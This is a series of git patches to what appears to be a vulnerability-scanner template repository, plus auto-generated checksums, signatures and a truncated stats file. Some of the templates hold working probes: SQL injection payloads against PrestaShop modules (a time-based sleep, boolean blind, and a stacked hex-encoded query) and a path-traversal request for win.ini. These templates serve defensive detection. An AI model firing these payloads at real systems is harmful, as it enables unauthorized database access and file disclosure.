a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 4cbf8a2d1f..2b4c3ad515 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -14,8 +14,6 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html - - https://github.com/ARPSyndicate/cvemon - - https://github.com/karimhabush/cyberowl classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,6 +33,9 @@ info: http: - raw: + - | + GET /modules/appagebuilder/config.xml HTTP/1.1 + Host: {{Hostname}} - | POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} @@ -44,21 +45,43 @@ http: leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | - GET /modules/appagebuilder/config.xml HTTP/1.1 + POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}} + X-Requested-With: XMLHttpRequest + leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI + - | + POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}} + X-Requested-With: XMLHttpRequest + + leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI extractors: - type: regex name: version - part: body_2 + part: body_1 internal: true group: 1 regex: - "\\s*\\s*<\\/version>" matchers: - type: dsl + name: time-based dsl: - - 'duration_1>=6' - - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")' + - 'duration_2>=6' + - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' condition: and -# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + + - type: dsl + name: blind-based + dsl: + - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' + - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")' + - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")' + - 'len(body_3) > 200 && len(body_4) <= 22' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index e9306d239e..9c6e143c49 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -22,6 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;-- + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + + host-redirects: true + matchers-condition: and matchers: - type: dsl From 93a99eb81c3c6f104bf106138d4b8ba471e20356 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 May 2024 15:47:47 +0530 Subject: [PATCH 0766/1768] deprecated protocol syntax --- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 2 +- http/misconfiguration/titannit-web-exposure.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 7df09d52bf..17cd51304b 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.favicon.hash:-2051052918 tags: cve,cve2024,auth-bypass,flowise -requests: +http: - method: GET path: - "{{BaseURL}}/API/V1/credentials" diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 76689ee791..5576e36737 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -21,7 +21,7 @@ info: shodan-query: html:"RaidenMAILD" tags: cve,cve2024,lfi,raiden,mail,server -requests: +http: - method: GET path: - "{{BaseURL}}/webeditor/../../../windows/win.ini" diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index 2ff8cdd3ef..dfd60debbb 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"Cassia Bluetooth Gateway Management Platform" tags: cassia,gateway,login,panel -requests: +http: - method: GET path: - "{{BaseURL}}/cassia/login" diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index 8820107c4c..8abc2f4016 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -10,7 +10,7 @@ info: shodan-query: title:"TitanNit Web Control" tags: misconfig,titannit,webcontrol,exposure -requests: +http: - method: GET path: - "{{BaseURL}}" From b5998cbf9ee2ecbc925111167b7472f847541bca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:23:07 +0000 Subject: [PATCH 0768/1768] Auto Generated Templates Checksum [Fri May 10 10:23:07 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 794f742137..b46a6a2fef 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,12 +3273,12 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d -http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 +http/cves/2024/CVE-2024-31621.yaml:a8be34655c70d85af9a56ca6f57228c1c0cd0b78 http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 +http/cves/2024/CVE-2024-32399.yaml:73046107ec5e2333ffbfbc9048afe6d20f6401ac http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 @@ -3627,7 +3627,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:1decbcfd31237f785c6a156d79e8db4a25cb2d14 +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:eb3de9785c4ec199f308428c8f25e37d43d94b93 http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -5342,7 +5342,7 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:a05bd46e0de9832515105802a679ed46f6af687b +http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 @@ -5655,7 +5655,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 -http/misconfiguration/titannit-web-exposure.yaml:7a171e9165d8f1a7467e018c320247c2eba80b9c +http/misconfiguration/titannit-web-exposure.yaml:ca61b80c8d10fe5c8b27923a98bddddb9461c842 http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -6683,7 +6683,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:add7609902cf4ff52e54789877b8860c4f4c6afe +http/technologies/favicon-detect.yaml:43e1210c06cedc5762c38b9ed9690d21e0d01527 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8499,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8c5c4d64ae270c6b4d3f298c40eb7b95600371e +templates-checksum.txt:07fe2e75905885b44a32ce84cd835eb6768bd265 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 19e9bdc1a5f8d2dcf52091e713d1a8c87da45c7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:24:47 +0000 Subject: [PATCH 0769/1768] Auto Template Signing [Fri May 10 10:24:47 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 2 +- http/misconfiguration/titannit-web-exposure.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 17cd51304b..6adada63e3 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 5576e36737..bdfa872f02 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -33,4 +33,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index dfd60debbb..8b46061d8a 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c69b6c8548d94d08177c560687c5ec6af029a7511c5c523f616cf8f15844d4c022049e60a52750b8da203076f14e8fc0a4389656a8d09dea222c577ee04de8a08af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index 8abc2f4016..8835426e75 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -27,4 +27,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077208e0ba5999cbde1529675b00c4aef08f25d22e17a7e32c879f55fc08d959d022009302237c4976cf4ac3b3178a0e47031e8775526bf381a67ce375519524ac681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 198217504d5e23b7c34d2f5a5ad4835f5e6a7fc1 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 10 May 2024 05:34:53 -0500 Subject: [PATCH 0770/1768] Update azure-takeover-detection.yaml Is better to check for the CNAME values instead of words in the response. A lot of false positives appear if they contain on of the terms to match, example: azurewebsites.net.reddog.microsoft.com --- dns/azure-takeover-detection.yaml | 50 ++++++++++++++----------------- 1 file changed, 23 insertions(+), 27 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index c7c350400a..fdddd8cff0 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -4,7 +4,7 @@ info: name: Microsoft Azure Takeover Detection author: pdteam severity: high - description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource. + description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D> reference: - https://godiego.co/posts/STO/ - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover @@ -25,33 +25,29 @@ dns: matchers: - type: word words: - - "azure-api.net" - - "azure-mobile.net" - - "azurecontainer.io" - - "azurecr.io" - - "azuredatalakestore.net" - - "azureedge.net" - - "azurefd.net" - - "azurehdinsight.net" - - "azurewebsites.net" - - "azurewebsites.windows.net" - - "blob.core.windows.net" - - "cloudapp.azure.com" - - "cloudapp.net" - - "database.windows.net" - - "redis.cache.windows.net" - - "search.windows.net" - - "servicebus.windows.net" - - "trafficmanager.net" - - "visualstudio.com" - - - type: word - words: - - "NXDOMAIN" - + - NXDOMAIN + - type: dsl + dsl: + - 'contains(cname, "azure-api.net")' + - 'contains(cname, "azure-mobile.net")' + - 'contains(cname, "azurecontainer.io")' + - 'contains(cname, "azurecr.io")' + - 'contains(cname, "azuredatalakestore.net")' + - 'contains(cname, "azureedge.net")' + - 'contains(cname, "azurefd.net")' + - 'contains(cname, "azurehdinsight.net")' + - 'contains(cname, "azurewebsites.net")' + - 'contains(cname, "azurewebsites.windows.net")' + - 'contains(cname, "blob.core.windows.net")' + - 'contains(cname, "cloudapp.azure.com")' + - 'contains(cname, "cloudapp.net")' + - 'contains(cname, "database.windows.net")' + - 'contains(cname, "redis.cache.windows.net")' + - 'contains(cname, "search.windows.net")' + - 'contains(cname, "servicebus.windows.net")' + - 'contains(cname, "trafficmanager.net")' + - 'contains(cname, "visualstudio.com")' extractors: - type: dsl dsl: - cname - -# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950 From af2f5ade8432064c70c00f982af826c44fa6a36e Mon Sep 17 00:00:00 2001 From: mastercho Date: Fri, 10 May 2024 13:39:32 +0300 Subject: [PATCH 0771/1768] reverting to last stage --- http/cves/2023/CVE-2023-46347.yaml | 35 +++++++++++++++++------------- 1 file changed, 20 insertions(+), 15 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 9c6e143c49..7a9a3cacbe 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -1,40 +1,45 @@ id: CVE-2023-46347 + info: - name: CVE-2023-46347 + name: PrestaShop Step by Step products Pack - SQL Injection author: MaStErChO - severity: high + severity: critical description: | In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions. reference: - https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html - https://stack.chaitin.com/poc/detail/3977 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46347 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.31923 + cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: + verified: true max-request: 1 + vendor: ndkdesign + product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: sqli,prestashop,ndk_steppingpack + tags: cve,cve2023,sqli,prestashop,ndk_steppingpack http: - raw: - | + @timeout: 10s POST /modules/ndk_steppingpack/search-result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;-- - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=6' - - type: status - status: - - 200 \ No newline at end of file + - duration>=6 + - contains(content_type, "text/html") + - contains(header, 'PrestaShop') + condition: and \ No newline at end of file From ffae3db2eb7be08674c708961e383a6bb070f73b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:59:30 +0000 Subject: [PATCH 0772/1768] Auto Generated Templates Stats [Fri May 10 10:59:30 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10608 +++++++++++++++++++++-------------------- TOP-10.md | 18 +- 3 files changed, 5332 insertions(+), 5296 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 07524d5b8e..8da832e644 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2435},{"name":"panel","count":1123},{"name":"wordpress","count":962},{"name":"exposure","count":901},{"name":"xss","count":895},{"name":"wp-plugin","count":837},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":647},{"name":"misconfig","count":602},{"name":"edb","count":599},{"name":"rce","count":586},{"name":"packetstorm","count":528},{"name":"cve2021","count":491},{"name":"wpscan","count":487},{"name":"cve2022","count":476},{"name":"wp","count":411},{"name":"unauth","count":361},{"name":"cve2023","count":347},{"name":"file","count":346},{"name":"sqli","count":344},{"name":"authenticated","count":341},{"name":"intrusive","count":297},{"name":"kev","count":271},{"name":"cve2020","count":257},{"name":"login","count":250},{"name":"detect","count":249},{"name":"token-spray","count":243},{"name":"config","count":220},{"name":"oast","count":219},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"default-login","count":209},{"name":"token","count":193},{"name":"","count":191},{"name":"network","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":164},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":134},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":127},{"name":"ssrf","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"cms","count":108},{"name":"install","count":106},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":88},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"takeover","count":78},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":58},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"php","count":44},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"jndi","count":44},{"name":"deserialization","count":43},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"cve2024","count":42},{"name":"osint-porn","count":42},{"name":"generic","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"microsoft","count":39},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"injection","count":38},{"name":"listing","count":37},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"ec2","count":30},{"name":"tls","count":30},{"name":"osint-coding","count":30},{"name":"dlink","count":29},{"name":"wp-theme","count":28},{"name":"ssh","count":28},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"api","count":28},{"name":"fortinet","count":27},{"name":"bestwebsoft","count":27},{"name":"citrix","count":26},{"name":"cve2012","count":26},{"name":"zohocorp","count":25},{"name":"firewall","count":25},{"name":"proxy","count":25},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"lfr","count":24},{"name":"osint-images","count":24},{"name":"admin","count":24},{"name":"zoho","count":24},{"name":"osint-shopping","count":24},{"name":"dns","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"xxe","count":23},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"audit","count":23},{"name":"yonyou","count":23},{"name":"cicd","count":22},{"name":"s3","count":22},{"name":"dast","count":21},{"name":"file-upload","count":21},{"name":"github","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"printer","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"rukovoditel","count":19},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"ftp","count":19},{"name":"wavlink","count":19},{"name":"struts","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"prestashop","count":18},{"name":"node.js","count":17},{"name":"confluence","count":17},{"name":"nginx","count":17},{"name":"service","count":17},{"name":"azure","count":17},{"name":"vpn","count":16},{"name":"osint-blog","count":16},{"name":"mail","count":16},{"name":"alibaba","count":16},{"name":"rconfig","count":16},{"name":"microweber","count":16},{"name":"cve2009","count":16},{"name":"honeypot","count":16},{"name":"status","count":16},{"name":"jarm","count":16},{"name":"backup","count":16},{"name":"cve2008","count":15},{"name":"zyxel","count":15},{"name":"backdoor","count":15},{"name":"java","count":15},{"name":"cve2013","count":15},{"name":"dashboard","count":15},{"name":"ruby","count":15},{"name":"nodejs","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"magento","count":15},{"name":"bypass","count":15},{"name":"woocommerce","count":15},{"name":"seeyon","count":15},{"name":"nagios","count":14},{"name":"rds","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"osint-health","count":14},{"name":"smtp","count":14},{"name":"smb","count":14},{"name":"redis","count":14},{"name":"windows","count":14},{"name":"redhat","count":14},{"name":"osint-art","count":14},{"name":"headless","count":14},{"name":"creds-stuffing","count":14},{"name":"docker","count":14},{"name":"login-check","count":14},{"name":"domainmod","count":14},{"name":"npm","count":14},{"name":"setup","count":14},{"name":"node","count":14},{"name":"dell","count":14},{"name":"auth","count":14},{"name":"cuppacms","count":13},{"name":"cuppa","count":13},{"name":"netgear","count":13},{"name":"ssti","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"osint-dating","count":13},{"name":"airflow","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"ivanti","count":13},{"name":"graphql","count":13},{"name":"fortigate","count":13},{"name":"hashicorp","count":13},{"name":"osint-political","count":13},{"name":"git","count":13},{"name":"sonicwall","count":13},{"name":"rails","count":13},{"name":"doppler","count":12},{"name":"zimbra","count":12},{"name":"newrelic","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"ofbiz","count":12},{"name":"moosocial","count":12},{"name":"kafka","count":12},{"name":"webserver","count":12},{"name":"prometheus","count":11},{"name":"phpmyadmin","count":11},{"name":"iam","count":11},{"name":"xstream","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"django","count":11},{"name":"online-fire-reporting","count":11},{"name":"phpgurukul","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"spring","count":11},{"name":"vbulletin","count":11},{"name":"fastjson","count":11},{"name":"osint-video","count":11},{"name":"cache","count":11},{"name":"jetbrains","count":11},{"name":"glpi","count":10},{"name":"info-leak","count":10},{"name":"dropbox","count":10},{"name":"digitalocean","count":10},{"name":"elasticsearch","count":10},{"name":"installer","count":10},{"name":"hikvision","count":10},{"name":"sitecore","count":10},{"name":"solarview","count":10},{"name":"dedecms","count":10},{"name":"thinkphp","count":10},{"name":"xstream_project","count":10},{"name":"db","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"samsung","count":10},{"name":"zabbix","count":10},{"name":"progress","count":9},{"name":"elastic","count":9},{"name":"artica","count":9},{"name":"cloudtrail","count":9},{"name":"opencats","count":9},{"name":"facebook","count":9},{"name":"kube","count":9},{"name":"versa","count":9},{"name":"sangfor","count":9},{"name":"exchange","count":9},{"name":"druid","count":9},{"name":"crlf","count":9},{"name":"bitbucket","count":9},{"name":"scada","count":9},{"name":"cnvd2020","count":9},{"name":"moodle","count":9},{"name":"dahua","count":9},{"name":"firebase","count":9},{"name":"python","count":9},{"name":"sophos","count":9},{"name":"gitea","count":9},{"name":"wso2","count":9},{"name":"secret","count":9},{"name":"vcenter","count":9},{"name":"lucee","count":9},{"name":"pfsense","count":9},{"name":"blind","count":9},{"name":"manager","count":8},{"name":"console","count":8},{"name":"config-audit","count":8},{"name":"hms","count":8},{"name":"ognl","count":8},{"name":"spotweb_project","count":8},{"name":"odoo","count":8},{